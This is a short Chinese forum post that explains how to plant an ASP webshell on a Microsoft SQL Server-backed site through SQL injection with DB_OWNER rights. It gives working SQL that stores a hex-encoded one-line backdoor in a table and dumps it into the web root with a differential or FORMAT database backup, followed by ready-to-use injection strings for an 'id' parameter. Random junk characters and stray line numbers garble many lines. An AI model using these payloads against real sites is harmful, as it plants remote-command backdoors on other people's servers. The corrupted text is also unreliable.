DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:

减少备份文件大小，得到可执行的webshell成功率提高不少
( x  V4 t% T- I一利用差异备份
5 x1 ^7 l% J/ Z6 X) ]. j9 M加一个参数WITH DIFFERENTIAL

1
2
# ~6 d" [; |4 n. j  |% A, r3
4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
2 e, O( X7 ^- q; I" ainsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
" k1 |/ q$ ?, }, s! l( X
6 g! |+ ~4 a' E1 z  D$ J二利用完全FORMAT
加一个参数WITH FROMAT
有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以
: k# N5 P( ]) V0 C
1
) C0 h# ?5 W; }- E1 H2
3
8 H% {5 _! O9 `: f# v/ m4
$ M& d+ h* X( Y. W1 A6 r7 m3 l declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
" v  `( w7 d; a' p" Qinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
3 T! W5 ~' m5 {- {) q- m7 gdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
( e* B7 t- x( r1 U, k( S
总的来说就是那么简单几句,下面以备份数据库model为例子
1
5 w1 K8 s' I9 t& v5 V, L
1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')

2
; h1 [( m! A4 c: s  q3 l
9 d' c, O# ?0 w1 |0 ?& \& X1
id=1;backup database model to disk='你的路径‘ with differential,format;--
3 e5 G+ `; T6 V